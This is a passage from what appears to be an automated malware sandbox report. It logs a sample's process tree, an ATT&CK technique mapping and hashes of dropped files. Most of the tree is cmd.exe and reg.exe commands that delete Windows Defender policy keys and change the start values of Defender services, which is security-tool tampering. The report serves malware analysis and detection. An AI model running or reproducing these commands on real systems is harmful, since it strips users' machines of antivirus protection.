  2⤵
  PID:10704
- - C:\Windows\SysWOW64\reg.exe
    reg delete "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender" /v DisableAntiSpyware /f
    3⤵
    PID:4124
- C:\Windows\SysWOW64\cmd.exe
  cmd.exe /c "reg delete "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender" /v PUAProtection /f"
  2⤵
  PID:10844
- C:\Windows\SysWOW64\cmd.exe
  cmd.exe /c "reg delete "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender" /v RandomizeScheduleTaskTimes /f"
  2⤵
  PID:5196
- - C:\Windows\SysWOW64\reg.exe
    reg delete "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender" /v RandomizeScheduleTaskTimes /f
    3⤵
    PID:6812
- C:\Windows\SysWOW64\cmd.exe
  cmd.exe /c "reg delete "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions" /v DisableAutoExclusions /f"
  2⤵
  PID:8752
- - C:\Windows\SysWOW64\reg.exe
    reg delete "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions" /v DisableAutoExclusions /f
    3⤵
    PID:7364
- C:\Windows\SysWOW64\cmd.exe
  cmd.exe /c "reg delete "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\MpEngine" /v MpEnablePus /f"
  2⤵
  PID:5828
- C:\Windows\SysWOW64\cmd.exe
  cmd.exe /c "reg delete "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Quarantine" /v LocalSettingOverridePurgeItemsAfterDelay /f"
  2⤵
  PID:3664
- C:\Windows\SysWOW64\cmd.exe
  cmd.exe /c "reg delete "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Quarantine" /v PurgeItemsAfterDelay /f"
  2⤵
  PID:8672
- C:\Windows\SysWOW64\cmd.exe
  cmd.exe /c "reg delete "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection" /v DisableBehaviorMonitoring /f"
  2⤵
  PID:1940
- C:\Windows\SysWOW64\cmd.exe
  cmd.exe /c "reg delete "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection" /v DisableIOAVProtection /f"
  2⤵
  PID:2268
- C:\Windows\SysWOW64\cmd.exe
  cmd.exe /c "reg delete "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection" /v DisableOnAccessProtection /f"
  2⤵
  PID:5544
- - C:\Windows\System32\Conhost.exe
    \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
    3⤵
    PID:7528
- C:\Windows\SysWOW64\cmd.exe
  cmd.exe /c "reg delete "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection" /v DisableRealtimeMonitoring /f"
  2⤵
  PID:8272
- - C:\Windows\System32\Conhost.exe
    \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
    3⤵
    PID:8920
- C:\Windows\SysWOW64\cmd.exe
  cmd.exe /c "reg delete "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection" /v DisableRoutinelyTakingAction /f"
  2⤵
  PID:3184
- - C:\Windows\System32\Conhost.exe
    \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
    3⤵
    PID:5252
- C:\Windows\SysWOW64\cmd.exe
  cmd.exe /c "reg delete "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection" /v DisableScanOnRealtimeEnable /f"
  2⤵
  PID:6396
- C:\Windows\SysWOW64\cmd.exe
  cmd.exe /c "reg delete "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection" /v DisableScriptScanning /f"
  2⤵
  PID:1416
- C:\Windows\SysWOW64\cmd.exe
  cmd.exe /c "reg delete "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Remediation" /v Scan_ScheduleDay /f"
  2⤵
  PID:1840
- C:\Windows\SysWOW64\cmd.exe
  cmd.exe /c "reg delete "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Remediation" /v Scan_ScheduleTime /f"
  2⤵
  PID:5592
- - C:\Windows\SysWOW64\reg.exe
    reg delete "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Remediation" /v Scan_ScheduleTime /f
    3⤵
    PID:5844
- C:\Windows\SysWOW64\cmd.exe
  cmd.exe /c "reg delete "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Reporting" /v AdditionalActionTimeOut /f"
  2⤵
  PID:3476
- - C:\Windows\System32\Conhost.exe
    \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
    3⤵
    PID:6188
- C:\Windows\SysWOW64\cmd.exe
  cmd.exe /c "reg delete "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Reporting" /v CriticalFailureTimeOut /f"
  2⤵
  PID:8216
- C:\Windows\SysWOW64\cmd.exe
  cmd.exe /c "reg delete "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Reporting" /v DisableEnhancedNotifications /f"
  2⤵
  PID:10712
- C:\Windows\SysWOW64\cmd.exe
  cmd.exe /c "reg delete "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Reporting" /v DisableGenericRePorts /f"
  2⤵
  PID:8656
- C:\Windows\SysWOW64\cmd.exe
  cmd.exe /c "reg delete "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Reporting" /v NonCriticalTimeOut /f"
  2⤵
  PID:4876
- - C:\Windows\SysWOW64\reg.exe
    reg delete "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Reporting" /v NonCriticalTimeOut /f
    3⤵
    PID:4832
- C:\Windows\SysWOW64\cmd.exe
  cmd.exe /c "reg delete "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Scan" /v AvgCPULoadFactor /f"
  2⤵
  PID:2552
- C:\Windows\SysWOW64\cmd.exe
  cmd.exe /c "reg delete "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Scan" /v DisableArchiveScanning /f"
  2⤵
  PID:8892
- - C:\Windows\SysWOW64\reg.exe
    reg delete "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Scan" /v DisableArchiveScanning /f
    3⤵
    PID:3508
- C:\Windows\SysWOW64\cmd.exe
  cmd.exe /c "reg delete "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Scan" /v DisableCatchupFullScan /f"
  2⤵
  PID:6184
- - C:\Windows\SysWOW64\reg.exe
    reg delete "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Scan" /v DisableCatchupFullScan /f
    3⤵
    PID:8928
- C:\Windows\SysWOW64\cmd.exe
  cmd.exe /c "reg delete "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Scan" /v DisableCatchupQuickScan /f"
  2⤵
  PID:8012
- C:\Windows\SysWOW64\cmd.exe
  cmd.exe /c "reg delete "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Scan" /v DisableRemovableDriveScanning /f"
  2⤵
  PID:6240
- - C:\Windows\System32\Conhost.exe
    \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
    3⤵
    PID:6780
- C:\Windows\SysWOW64\cmd.exe
  cmd.exe /c "reg delete "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Scan" /v DisableRestorePoint /f"
  2⤵
  PID:868
- C:\Windows\SysWOW64\cmd.exe
  cmd.exe /c "reg delete "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Scan" /v DisableScanningMappedNetworkDrivesForFullScan /f"
  2⤵
  PID:9032
- C:\Windows\SysWOW64\cmd.exe
  cmd.exe /c "reg delete "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Scan" /v DisableScanningNetworkFiles /f"
  2⤵
  PID:3128
- C:\Windows\SysWOW64\cmd.exe
  cmd.exe /c "reg delete "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Scan" /v PurgeItemsAfterDelay /f"
  2⤵
  PID:8832
- C:\Windows\SysWOW64\cmd.exe
  cmd.exe /c "reg delete "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Scan" /v ScanOnlyIfIdle /f"
  2⤵
  PID:4956
- C:\Windows\SysWOW64\cmd.exe
  cmd.exe /c "reg delete "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Scan" /v ScanParameters /f"
  2⤵
  PID:7392
- C:\Windows\SysWOW64\cmd.exe
  cmd.exe /c "reg delete "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Scan" /v ScheduleDay /f"
  2⤵
  PID:5468
- C:\Windows\SysWOW64\cmd.exe
  cmd.exe /c "reg delete "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Scan" /v ScheduleTime /f"
  2⤵
  PID:4412
- C:\Windows\SysWOW64\cmd.exe
  cmd.exe /c "reg delete "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Signature Updates" /v DisableUpdateOnStartupWithoutEngine /f"
  2⤵
  PID:7432
- - C:\Windows\SysWOW64\reg.exe
    reg delete "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Signature Updates" /v DisableUpdateOnStartupWithoutEngine /f
    3⤵
    PID:10140
- C:\Windows\SysWOW64\cmd.exe
  cmd.exe /c "reg delete "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Signature Updates" /v ScheduleDay /f"
  2⤵
  PID:9164
- - C:\Windows\System32\Conhost.exe
    \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
    3⤵
    PID:1384
- C:\Windows\SysWOW64\cmd.exe
  cmd.exe /c "reg delete "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Signature Updates" /v ScheduleTime /f"
  2⤵
  PID:4792
- C:\Windows\SysWOW64\cmd.exe
  cmd.exe /c "reg delete "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Signature Updates" /v SignatureUpdateCatchupInterval /f"
  2⤵
  PID:7736
- - C:\Windows\SysWOW64\reg.exe
    reg delete "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Signature Updates" /v SignatureUpdateCatchupInterval /f
    3⤵
    PID:9236
- C:\Windows\SysWOW64\cmd.exe
  cmd.exe /c "reg delete "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\SpyNet" /v DisableBlockAtFirstSeen /f"
  2⤵
  PID:8096
- C:\Windows\SysWOW64\cmd.exe
  cmd.exe /c "reg delete "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /v LocalSettingOverrideSpynetReporting /f"
  2⤵
  PID:5896
- C:\Windows\SysWOW64\cmd.exe
  cmd.exe /c "reg delete "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /v SpyNetReporting /f"
  2⤵
  PID:8228
- C:\Windows\SysWOW64\cmd.exe
  cmd.exe /c "reg delete "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /v SpyNetReportingLocation /f"
  2⤵
  PID:7164
- - C:\Windows\SysWOW64\reg.exe
    reg delete "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /v SpyNetReportingLocation /f
    3⤵
    PID:6556
- C:\Windows\SysWOW64\cmd.exe
  cmd.exe /c "reg delete "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /v SubmitSamplesConsent /f"
  2⤵
  PID:2080
- C:\Windows\SysWOW64\cmd.exe
  cmd.exe /c reg add HKLM\SYSTEM\ControlSet001\Services\Sense /v Start /t REG_DWORD /d 3 /f
  2⤵
  PID:7672
- - C:\Windows\System32\Conhost.exe
    \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
    3⤵
    PID:3080
- C:\Windows\SysWOW64\cmd.exe
  cmd.exe /c reg add HKLM\SYSTEM\ControlSet001\Services\WinDefend /v Start /t REG_DWORD /d 2 /f
  2⤵
  PID:5644
- - C:\Windows\SysWOW64\reg.exe
    reg add HKLM\SYSTEM\ControlSet001\Services\WinDefend /v Start /t REG_DWORD /d 2 /f
    3⤵
    - Modifies registry key
    PID:8776
- C:\Windows\SysWOW64\cmd.exe
  cmd.exe /c reg add HKLM\SYSTEM\ControlSet001\Services\MsSecFlt /v Start /t REG_DWORD /d 0 /f
  2⤵
  PID:5972
- C:\Windows\SysWOW64\cmd.exe
  cmd.exe /c reg add HKLM\SYSTEM\ControlSet001\Services\SecurityHealthService /v Start /t REG_DWORD /d 3 /f
  2⤵
  PID:5908
- C:\Windows\SysWOW64\cmd.exe
  cmd.exe /c reg add HKLM\SYSTEM\ControlSet001\Services\WdBoot /v Start /t REG_DWORD /d 0 /f
  2⤵
  PID:9176
- - C:\Windows\SysWOW64\reg.exe
    reg add HKLM\SYSTEM\ControlSet001\Services\WdBoot /v Start /t REG_DWORD /d 0 /f
    3⤵
    - Modifies registry key
    PID:7396
- C:\Windows\SysWOW64\cmd.exe
  cmd.exe /c reg add HKLM\SYSTEM\ControlSet001\Services\WdFilter /v Start /t REG_DWORD /d 0 /f
  2⤵
  PID:1728
- C:\Windows\SysWOW64\cmd.exe
  cmd.exe /c reg add HKLM\SYSTEM\ControlSet001\Services\WdNisDrv /v Start /t REG_DWORD /d 3 /f
  2⤵
  PID:6416
- - C:\Windows\SysWOW64\reg.exe
    reg add HKLM\SYSTEM\ControlSet001\Services\WdNisDrv /v Start /t REG_DWORD /d 3 /f
    3⤵
    PID:10356
- C:\Windows\SysWOW64\cmd.exe
  cmd.exe /c reg add HKLM\SYSTEM\ControlSet001\Services\WdNisSvc /v Start /t REG_DWORD /d 3 /f
  2⤵
  PID:10908
- - C:\Windows\SysWOW64\reg.exe
    reg add HKLM\SYSTEM\ControlSet001\Services\WdNisSvc /v Start /t REG_DWORD /d 3 /f
    3⤵
    PID:7692
- C:\Windows\SysWOW64\cmd.exe
  cmd.exe /c reg add HKLM\SYSTEM\ControlSet001\Control\WMI\Autologger\DefenderApiLogger /v Start /t REG_DWORD /d 1 /f
  2⤵
  PID:2112
- - C:\Windows\SysWOW64\reg.exe
    reg add HKLM\SYSTEM\ControlSet001\Control\WMI\Autologger\DefenderApiLogger /v Start /t REG_DWORD /d 1 /f
    3⤵
    - Modifies registry key
    PID:3712
- C:\Windows\SysWOW64\cmd.exe
  cmd.exe /c reg add HKLM\SYSTEM\ControlSet001\Control\WMI\Autologger\DefenderAuditLogger /v Start /t REG_DWORD /d 1 /f
  2⤵
  PID:9284
- C:\Windows\SysWOW64\cmd.exe
  cmd.exe /c reg delete HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\StartupApproved\Run /v SecurityHealth /t REG_BINARY /d 03,00,00,00,00,00,00,00,00,00,00,00 /f
  2⤵
  - An obfuscated cmd.exe command-line is typically used to evade detection.
  PID:9268
- - C:\Windows\System32\Conhost.exe
    \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
    3⤵
    PID:3276
- - C:\Windows\SysWOW64\reg.exe
    reg delete HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\StartupApproved\Run /v SecurityHealth /t REG_BINARY /d 03,00,00,00,00,00,00,00,00,00,00,00 /f
    3⤵
    - Modifies registry key
    PID:6872
- C:\Windows\SysWOW64\cmd.exe
  cmd.exe /c reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run /v SecurityHealt /t REG_EXPAND_SZ /d %%windir%%\system32\SecurityHealthSystray.exe /f
  2⤵
  PID:8760
- C:\Windows\SysWOW64\cmd.exe
  cmd.exe /c %SYSTEMROOT%\System32\OneDriveSetup.exe
  2⤵
  PID:6248
- - C:\Windows\System32\Conhost.exe
    \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
    3⤵
    PID:8488
- - C:\Windows\SysWOW64\OneDriveSetup.exe
    C:\Windows\System32\OneDriveSetup.exe
    3⤵
    PID:1868
- C:\Windows\SysWOW64\cmd.exe
  cmd.exe /c %SystemRoot%\SysWOW64\OneDriveSetup.exe
  2⤵
  PID:9156
- - C:\Windows\SysWOW64\OneDriveSetup.exe
    C:\Windows\SysWOW64\OneDriveSetup.exe
    3⤵
    PID:9360

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k netsvcs -p -s seclogon
1⤵
PID:5044

C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.19041.1220_none_7e21bc567c7ed16b\TiWorker.exe
C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.19041.1220_none_7e21bc567c7ed16b\TiWorker.exe -Embedding
1⤵
PID:4184

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Persistence

Boot or Logon Autostart Execution

T1547

Registry Run Keys / Startup Folder

T1547.001

Create or Modify System Process

T1543

Windows Service

T1543.003

Event Triggered Execution

T1546

Change Default File Association

T1546.001

Component Object Model Hijacking

T1546.015

Privilege Escalation

Boot or Logon Autostart Execution

T1547

Registry Run Keys / Startup Folder

T1547.001

Create or Modify System Process

T1543

Windows Service

T1543.003

Event Triggered Execution

T1546

Change Default File Association

T1546.001

Component Object Model Hijacking

T1546.015

Defense Evasion

Impair Defenses

T1562

Disable or Modify Tools

T1562.001

Modify Registry

T1112

Credential Access

Discovery

Query Registry

T1012

System Information Discovery

T1082

System Location Discovery

T1614

System Language Discovery

T1614.001

Lateral Movement

Collection

Command and Control

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\E2C6CBAF0AF08CF203BA74BF0D0AB6D5_CBDCCBFE4F7A916411C1E69BDD97BB04

Filesize
471B

MD5
a8b8e97f35e913d8380de208cbae2610

SHA1
1ad6c0148e1a302dee28f8171835bc2e9ac81f09

SHA256
11851918cc117f9802eb386e3f018460eb49861af54c5797287bca248675bc92

SHA512
cb995c892dc668e7b8427f99e3a054218a834fd030eec1660b96a5b12c5518b1dfd8370eea5e7bf09a9dd93caf3b6fc23f6c07269071cab13ba121710f6e5f9b

Download Submit
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\E2C6CBAF0AF08CF203BA74BF0D0AB6D5_CBDCCBFE4F7A916411C1E69BDD97BB04

Filesize
412B

MD5
cf9277a1759729a5ba51bc8e6008db64

SHA1
45b7b60640694213d64db21ae9e429a02ac5cfba

SHA256
6b66bed04a6155d6a735a19ead72041fc0fdbc49949fed4e608db50512405d48

SHA512
3540d175b08bcba88d4cde203c436fac18902c3a4db7ae62058a2577cfc5517ba52ce7ff51f856142879b840f683d841d83e48ccdac73283b1f34ca2a65bda5c

Download Submit
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\E2C6CBAF0AF08CF203BA74BF0D0AB6D5_CBDCCBFE4F7A916411C1E69BDD97BB04

Filesize
412B

MD5
ee4c7ac03025b024c2b4e0be929c235f

SHA1
331ef55a83a603d328cdd580b8c4c6a943337be0

SHA256
e57bdb04cb34e270f89fa1f03970ebcb6daab11a4e155a1b0590d4f5f6404686

SHA512
db5301cd1617029cd7c5876283ef10f036ddf8a270dc6fd5f3468688cf309e810b68a6c592ed1054e1479599a942f2ba0c34c723dfc993fa0abe894792da2179

Download Submit
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\E2C6CBAF0AF08CF203BA74BF0D0AB6D5_CBDCCBFE4F7A916411C1E69BDD97BB04

Filesize
412B

MD5
6e68d706c1258d59e3c664ddb5acc7bd

SHA1
b5be88ffd080b3e8b8c4f9975414498e00b4786b

SHA256
f5e00441b5df499455c095f170cb9235754ffab112c1e8af98ab3832e369676d

SHA512
6d69ac4bd82c379243400b10e2b48f0abed87d305fa6e250797d24cbd7bccff999a73101c1308f892b0ed91f7f4b29231b2e07ef215ea0b26da502b54ce35d81

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\OneDrive\19.043.0304.0013\ETWlog.dll

Filesize
30KB

MD5
f55fdd78b5c1503ef1d8f7998aa5c854

SHA1
08344d4408cd8f8d0b1e59ede90be815140f1427

SHA256
078c755c5cc58be512faa3b294a8801c3e6f063b8593a7622201102cbc1fe554

SHA512
2c49bb82eaaee907adfcacd5c9b5a62489b24ef06478a932319ee6cc0f30981617c7131161fdf07426f3f3a59532922aca08d6ea0fa7b745a2a3069034710dc3

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\OneDrive\19.043.0304.0013\FileSyncClient.dll

Filesize
3.5MB

MD5
e24bc403c06263c42c0f613e7d6b9131

SHA1
bd14e829f1e120ab7a06d4cccf21e478802e8c18

SHA256
be400e4e272e45cf75abfaf3b30173b044b370f38562fea2ce00962079b8b48b

SHA512
d960b9eab6ef1b82b07ac30b5f1831ab391d515d698f1540e695269337eb0f958e644e36bba23fe5df86cd1601d5d7f20d5ff6db0178bb5ffe42bac1149b20e7

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\OneDrive\19.043.0304.0013\FileSyncConfig.exe

Filesize
299KB

MD5
f3d599fce8eded3bdfd228836270813c

SHA1
42dd75022856626b914a9add01c48d5e206d6eb8

SHA256
24e76fe67435e9c7c1aa9ec22d736de3873fbd2e880d8ae716dffec0e146fc53

SHA512
aedd379d24c2f5a1183453a736fd3d24830424c9deb13f8b959107ee14096a0edf2c3295776bf2228b428c91f6c3c4a4cb95c71de066843e54544f0371a77266

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\OneDrive\19.043.0304.0013\FileSyncSessions.dll

Filesize
1.7MB

MD5
825ad8c9894f395912544d80c84c0326

SHA1
78994fed7e13c976d089a24f05b84eece746cfa7

SHA256
b132ed85615448b868b1560d4e53fd0c7ca8810355d42b4a35d626bbc13bcc2e

SHA512
8ade7958061f911d93d6e38899d28e4ad63d8a7b74c7a12aa01e1887084e1dbbc1174870076c3a0e8fb519a81907978c8ae1102b381e3d8ec460aedcf445e463

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\OneDrive\19.043.0304.0013\FileSyncViews.dll

Filesize
1.1MB

MD5
524644d79ba8571b79347cb073531d1f

SHA1
5076e3c35d5de6e4bd7aa8fead7c7a2d59c42e36

SHA256
547fbfde9e3f986c6989ac55422573efdef6fe934d3159a1cd816a55db48a39e

SHA512
8e1a4ce4db4909b11c24ac725a46bcdadfca5082e7a6f7a4d629f508a4c4539c64ea5e37fad20fcf15763a7eb28bf4a5c305dc29b0842b71b8b04aecd21cf5ef

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\OneDrive\19.043.0304.0013\LogUploader.dll

Filesize
547KB

MD5
d9ecf4d2721751e0dcb3d1f48ebca46e

SHA1
efd7d6787d87437efb7edc0ecd47dd313123a5d1

SHA256
ced5dc6563d0f27e81fe8a2bf51e638fb421bc9bd1f13c9f3486076f4d2f3108

SHA512
2a427e3ea4fe8733a5f1289c95a71c8b13a3e7999f4745219e923b44e98d202202baace5853648625891ea13b44eb89012f576baac2105145413a2c16102928b

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\OneDrive\19.043.0304.0013\LoggingPlatform.dll

Filesize
1.4MB

MD5
e6ad7126fdb9e7c6a3af321e921098b0

SHA1
75b0783d503842e042f6caf3b84345cd7fee4b84

SHA256
eec0d50bae5bdb5b3899d2dbb5c90ac95163a3dceea259523a08eb1c8be38dbf

SHA512
86a8bbf24d225a0d5aa7bd1d616dfe1e31adb9fb914801d10ccd9df91b880e0ef5d0d2f512ecc21d4c4c7615afd44ac3ab80149d7ad0cf164daf8f2cbef1bc57

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\OneDrive\19.043.0304.0013\LogoImages\OneDriveMedTile.contrast-black_scale-100.png

Filesize
652B

MD5
433d5c9bfe71c70e6bf1f18b7da188f4

SHA1
54f9253621c725ea644b3c2a0a11b0ff6bf8e44c

SHA256
3ba55b200b58756480679cf8b6b98d7b3570f8dfcdb39186f721357da8d8172c

SHA512
49f00fbdd9dfc542a2ac844520d34fdeec927b932fad9910f189c9171d50aa4037f9cfb2e1de778e12ed964adae6d3b3aed60555fcc50712539f2e69fb44da8e

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\OneDrive\19.043.0304.0013\LogoImages\OneDriveMedTile.contrast-black_scale-125.png

Filesize
848B

MD5
f837c5aa1f38d8241b28b92d15eebe75

SHA1
9b11b235c11cfce25f1325eba753e469b5d5e74f

SHA256
cc134daaa737e48e0f37ff5bece33e23484c47b55cb6571f3283e73e14f54334

SHA512
c79f1fb011e21555db8d0fb249d37b1cfa31d2c35d1e7e0417035cbaa717174d63d5a535fbaf1578625c50cf2417dae1e0a97e06e8799e53a8af951c1cd6ff19

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\OneDrive\19.043.0304.0013\LogoImages\OneDriveMedTile.contrast-black_scale-150.png

Filesize
990B

MD5
262b8476753f83b4abd01017dcdb061f

SHA1
eb35a51e2be3fb5549623711115fa3a9c67128f4

SHA256
ef6ac1caa0aebe3d94ba86856fd69d68f370588a678b1b6f9f90c83b161d87ab

SHA512
17dc2b496cb655d4cc5e4422deb1eb1d8657f7bb99f85f442dc9c21b866bf54b4b35c09954f27ff36236125db80d4165ed7d665780c9caea8b1df42860bac148

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\OneDrive\19.043.0304.0013\LogoImages\OneDriveMedTile.contrast-black_scale-200.png

Filesize
1KB

MD5
a2184c1047a0c1fab0f465f2355ccf92

SHA1
95ac7cbcbf75a35c8f0cf0c8096bd885cd510af8

SHA256
eb846e01333b2dd4ce1c2aeccbd6d90874f976948b881aa362e13593a254ad70

SHA512
c49cb5d8327b92fcc6032f2f7e14a78399279c07deb5c2a3e60558fd91f702f5cf12392a6ceb818478dfea41cadf76b8e632492581edee19b5bea95f2cb36700

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\OneDrive\19.043.0304.0013\LogoImages\OneDriveMedTile.contrast-black_scale-400.png

Filesize
3KB

MD5
1554dd2698b5f2d81445704d4f4c58ba

SHA1
a1d39f0d37ebdd29ce14dc6fbd276eaaaa352c98

SHA256
f31eb37b641e0ab8782ef294adb57d31135e5aad8838c06f8fdb0a86929e39c4

SHA512
d4707fddb7744101079723198fe8df4db5463d3b07db6c4558ef7fdca8d4550022fcf576e38e213a577c91be5662f816a5d00e36d805b0320494320944176f23

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\OneDrive\19.043.0304.0013\LogoImages\OneDriveMedTile.contrast-white_scale-100.png

Filesize
662B

MD5
f0fd948f7e9d30f657c55490c70ee327

SHA1
2685a31eb19728cc8d9fd66378953cd114b7200e

SHA256
24685ca3546f1f95f9e9beca29534e134e69b031923e45723558201762bba147

SHA512
2b96bc7efa363b89d2f457886d63550bb015a89489bda09618cea4f168925e1168a51916ab9f79191e1b308c67724d88efd9f705d67a1d626ef11b841e85ed06

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\OneDrive\19.043.0304.0013\LogoImages\OneDriveMedTile.contrast-white_scale-125.png

Filesize
871B

MD5
5588d3464d135bda19ecb5f6284f1aa5

SHA1
d2efeeadc301743f0615c7f1445f081b37dce839

SHA256
2aa13d9ab91c6e04292a1d4e635fdd337088ccd8cebece9880c5fc67ced53faa

SHA512
a3f2f74e526fc93961c5584137558cab8166f1784f2a41b8e73e3ab94bcb1280185166702580a2a270331aacb835a75126b5fa34c93e6837f9262ef626bd8980

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\OneDrive\19.043.0304.0013\LogoImages\OneDriveMedTile.contrast-white_scale-150.png

Filesize
800B

MD5
748e43b4da7f7fc91a98534f1c90c32f

SHA1
65e9b6981252ce4d00b75b3b14ac67f0d0794f4a

SHA256
4eabc71f16afaaff190302a2656fc9faf542632b75f8294c721d008b9a51b46a

SHA512
fa590cadc4d7dee399d8abbd71381f39714fe73dc055db6bd8bfe4a8c7d29abd2288f2300ccbe0f01cb82b6eabaf01abf06fdc8a8508bd2bf801487df7165e4e

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\OneDrive\19.043.0304.0013\LogoImages\OneDriveMedTile.contrast-white_scale-200.png

Filesize
1KB

MD5
d69b68d21ed0c659704bca13218267c0

SHA1
9479f47cbafe1270453ce9dbe87b4617d7586b85

SHA256
78aea1a92cf325b6f2b1c8d2438122a3a38396ef28ccf4e6a77896bd1d04a31f

SHA512
ff1980d4e4a82ad781ad7e65554d1380389e4466f9603d4f9e3f890796be292947af0b3981cabbc0550d561ec1825b121b2beda43ce618f62311b075cb44ee3b

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\OneDrive\19.043.0304.0013\LogoImages\OneDriveMedTile.contrast-white_scale-400.png

Filesize
3KB

MD5
28005183d565fd56057ff53c2271c256

SHA1
ed6795fdabf969b986b6d754d4c677ef6204149b

SHA256
ecf4e09027031c0dc5f66cbeef68a96d59947c6eff969fef9908ddbbf9cdd3e1

SHA512
44b9f6d2dbaca794525c5098074fd00d6924ea3b939983acaf30523f0c3d547f6e21bab87c03221029c43a5952347f872d0d1a925f1fa29d5d82d09131e7ce38

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\OneDrive\19.043.0304.0013\LogoImages\OneDriveSmallTile.contrast-black_scale-100.png

Filesize
413B

MD5
52f5be0f8d3c5150b591a4656a50d6b0

SHA1
f5d2756286e241205e0a9f4fea34752f4574047c

SHA256
b00b6a09f4aa9dfff7026ff9c2ea5ec0236b05ae8b99d0cdb35c3a1ea78a5d2d

SHA512
0bae80db35f6c37658584b41f4832f74e576d38e1fe426dcbd37d5304267a63e2be92e447313d420e487834eda8a4145d030cbeb1ae3f4e10ec0ba6817a24f1e

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\OneDrive\19.043.0304.0013\LogoImages\OneDriveSmallTile.contrast-black_scale-125.png

Filesize
525B

MD5
bda3baf91f230bf2b10e2e019abc3eff

SHA1
33a97b6c95a56aa1ae908b96f56ab798676c7f06

SHA256
